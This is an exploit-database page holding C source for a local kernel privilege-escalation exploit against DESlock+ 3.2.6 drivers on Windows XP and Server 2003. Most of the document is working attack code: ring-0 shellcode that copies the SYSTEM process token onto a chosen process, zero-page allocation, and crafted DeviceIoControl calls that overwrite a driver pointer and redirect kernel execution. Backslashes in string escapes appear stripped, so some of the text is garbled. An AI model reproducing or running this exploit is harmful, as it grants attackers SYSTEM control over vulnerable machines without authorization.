[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : DESlock+ <= 3.2.6 local kernel ring0 link list zero SYSTEM Exploit
# Published : 2008-02-18
# Author : mu-b
# Previous Title : DESlock+ <= 3.2.6 (list) Local Kernel Memory Leak PoC
# Next Title : DESlock+ <= 3.2.6 DLMFDISK.sys local kernel ring0 SYSTEM Exploit


/* deslock-list-zero-v2.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * DESlock+ <= 3.2.6 local kernel ring0 link list zero SYSTEM exploit
 * by mu-b - Fri 28 Dec 2007
 *
 * - Tested on: DLMFENC.sys 1.0.0.26, DLMFDISK.sys 1.2.0.27
 *              - Microsoft Windows 2003 SP2
 *              - Microsoft Windows XP SP2
 *
 * Compile: MinGW + -lntdll
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <windows.h>
#include <ddk/ntapi.h>

#define DLMFENC_IOCTL     0x0FA4204C
#define DLMFENC_FLAG      0xC001D00D
#define DLKFDISK_R_IOCTL  0x80002008
#define DLKFDISK_SLOT     0x00000C5C

#define ARG_SIZE(a)       ((a)/sizeof (void *))

static unsigned char win32_fixup[] =
  "x53"
  "xebx0e"
  /* _fixup_copy  */
  "x5e"
  "xbfx5cx0cx00x00"
  "x31xc9"
  "xb1x04"
  "xf3xa5"
  "xebx15"
  /* _fixup_blk   */
  "xe8xedxffxffxff"
  "x64x0ax00x00"
  "xd3x0ax00x00"
  "x2ax0ax00x00"
  "x49x0ax00x00";

/* Win2k3 SP1/2 - kernel EPROCESS token switcher
 * by mu-b <mu-b@digit-lab.org>
 */
static unsigned char win2k3_ring0_shell[] =
  /* _ring0 */
  "xb8x24xf1xdfxff"
  "x8bx00"
  "x8bxb0x18x02x00x00"
  "x89xf0"
  /* _sys_eprocess_loop   */
  "x8bx98x94x00x00x00"
  "x81xfbx04x00x00x00"
  "x74x11"
  "x8bx80x9cx00x00x00"
  "x2dx98x00x00x00"
  "x39xf0"
  "x75xe3"
  "xebx21"
  /* _sys_eprocess_found  */
  "x89xc1"
  "x89xf0"

  /* _cmd_eprocess_loop   */
  "x8bx98x94x00x00x00"
  "x81xfbx00x00x00x00"
  "x74x10"
  "x8bx80x9cx00x00x00"
  "x2dx98x00x00x00"
  "x39xf0"
  "x75xe3"
  /* _not_found           */
  "xcc"
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* copy tokens!$%!      */
  "x8bx89xd8x00x00x00"
  "x89x88xd8x00x00x00"
  "x90";

static unsigned char winxp_ring0_shell[] =
  /* _ring0 */
  "xb8x24xf1xdfxff"
  "x8bx00"
  "x8bx70x44"
  "x89xf0"
  /* _sys_eprocess_loop   */
  "x8bx98x84x00x00x00"
  "x81xfbx04x00x00x00"
  "x74x11"
  "x8bx80x8cx00x00x00"
  "x2dx88x00x00x00"
  "x39xf0"
  "x75xe3"
  "xebx21"
  /* _sys_eprocess_found  */
  "x89xc1"
  "x89xf0"

  /* _cmd_eprocess_loop   */
  "x8bx98x84x00x00x00"
  "x81xfbx00x00x00x00"
  "x74x10"
  "x8bx80x8cx00x00x00"
  "x2dx88x00x00x00"
  "x39xf0"
  "x75xe3"
  /* _not_found           */
  "xcc"
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* copy tokens!$%!      */
  "x8bx89xc8x00x00x00"
  "x89x88xc8x00x00x00"
  "x90";

static unsigned char win32_ret[] =
  "x5b"
  "x31xff"
  "xb8xdcx0bx00x00"
  "xffxe0"
  "xcc";

struct ioctl_req {
  void *arg[ARG_SIZE(0x20)];
};

static PCHAR
fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen)
{
  DWORD dwVersion, dwMajorVersion, dwMinorVersion;

  dwVersion = GetVersion ();
  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

  if (dwMajorVersion != 5)
    {
      fprintf (stderr, "* GetVersion, unsupported versionn");
      exit (EXIT_FAILURE);
    }

  *(PDWORD) &win32_fixup[5]  += (DWORD) base;
  *(PDWORD) &win32_fixup[22] += (DWORD) base;
  *(PDWORD) &win32_fixup[26] += (DWORD) base;
  *(PDWORD) &win32_fixup[30] += (DWORD) base;
  *(PDWORD) &win32_fixup[34] += (DWORD) base;

  *(PDWORD) &win32_ret[4] += (DWORD) base;

  switch (dwMinorVersion)
    {
      case 1:
        *zlen = sizeof winxp_ring0_shell - 1;
        *(PDWORD) &winxp_ring0_shell[55] = ppid;
        return (winxp_ring0_shell);

      case 2:
        *zlen = sizeof win2k3_ring0_shell - 1;
        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
        return (win2k3_ring0_shell);

      default:
        fprintf (stderr, "* GetVersion, unsupported versionn");
        exit (EXIT_FAILURE);
    }

  return (NULL);
}

static PVOID
get_module_base (void)
{
  PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase;
  PSYSTEM_MODULE_INFORMATION pModuleInfo;
  DWORD i, num_modules, status, rlen;
  PVOID result;

  status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen);
  if (status != STATUS_INFO_LENGTH_MISMATCH)
    {
      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08Xn", status);
      exit (EXIT_FAILURE);
    }

  pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen);

  status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen);
  if (status != STATUS_SUCCESS)
    {
      fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08Xn", status);
      exit (EXIT_FAILURE);
    }

  num_modules = pModuleInfo->Count;
  pModuleBase = &pModuleInfo->Module[0];
  result = NULL;

  for (i = 0; i < num_modules; i++, pModuleBase++)
    if (strstr (pModuleBase->ImageName, "dlkfdisk.sys"))
      {
        result = pModuleBase->Base;
        break;
      }

  HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo);

  return (result);
}

static void
xor_mask_req (struct ioctl_req *req)
{
  DWORD i, pid;
  PCHAR ptr;

  pid = GetCurrentProcessId ();
  for (i = 0, ptr = (PCHAR) req; i < 0x0C; i++, ptr++)
    *ptr ^= pid;
}

int
main (int argc, char **argv)
{
  struct ioctl_req req;
  DWORD dResult, rlen, zpage_len, zlen, ppid;
  LPVOID zpage, zbuf, base;
  CHAR rbuf[64];
  HANDLE hFile;
  BOOL bResult;

  printf ("DESlock+ <= 3.2.6 local kernel ring0 link list zero SYSTEM exploitn"
          "by: <mu-b@digit-labs.org>n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!nn");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <processid to elevate>n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  ppid = atoi (argv[1]);

  hFile = CreateFileA ("\\.\DLKPFSD_Device", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %dn", hFile);
      exit (EXIT_FAILURE);
    }

  zpage_len = 0x7FFF;
  zpage = (LPVOID) 0x00000001;
  dResult = NtAllocateVirtualMemory ((HANDLE) -1, &zpage, 0, &zpage_len,
                                     MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
  if (dResult != STATUS_SUCCESS)
    {
      fprintf (stderr, "* NtAllocateVirtualMemory failedn");
      exit (EXIT_FAILURE);
    }
  printf ("* allocated page: 0x%08X [%d-bytes]n",
          zpage, 0x7FFF);

  base = get_module_base ();
  if (base == NULL)
    {
      fprintf (stderr, "* unable to find dlkfdisk.sys basen");
      exit (EXIT_FAILURE);
    }
  printf ("* dlkfdisk.sys base: 0x%08Xn", base);

  memset (zpage, 0xCC, 0x7FFF);
  zbuf = fixup_ring0_shell (base, ppid, &zlen);
  memcpy ((LPVOID) zpage, win32_fixup, sizeof (win32_fixup) - 1);
  memcpy ((LPVOID) (zpage + sizeof (win32_fixup) - 1), zbuf, zlen);
  memcpy ((LPVOID) (zpage + sizeof (win32_fixup) + zlen - 1),
          win32_ret, sizeof (win32_ret) - 1);

  memset (&req, 0, sizeof req);
  req.arg[0] = (void *) DLMFENC_FLAG;
  req.arg[1] = (void *) 0x12;
  req.arg[2] = (void *) (base + DLKFDISK_SLOT); /* overwrite pointer */

  printf ("* overwriting [@0x%08X %d-bytes].. ",
          base + DLKFDISK_SLOT, 16);
  xor_mask_req (&req);
  bResult = DeviceIoControl (hFile, DLMFENC_IOCTL,
                             &req, sizeof req, &req, sizeof req, &rlen, 0);
  if (!bResult)
    {
      fprintf (stderr, "DeviceIoControl failedn");
      exit (EXIT_FAILURE);
    }
  printf ("donen");

  CloseHandle (hFile);

  hFile = CreateFileA ("\\.\DLKFDisk_Control", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %dn", hFile);
      exit (EXIT_FAILURE);
    }

  /* jump to our address :) */
  printf ("* jumping.. ");
  bResult = DeviceIoControl (hFile, DLKFDISK_R_IOCTL,
                             &rbuf, sizeof rbuf, &rbuf, sizeof rbuf, &rlen, 0);
  if (!bResult)
    {
      fprintf (stderr, "DeviceIoControl failedn");
      exit (EXIT_FAILURE);
    }
  printf ("donenn"
          "* hmmm, you didn't STOP the box?!?!n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}

// www.Syue.com [2008-02-18]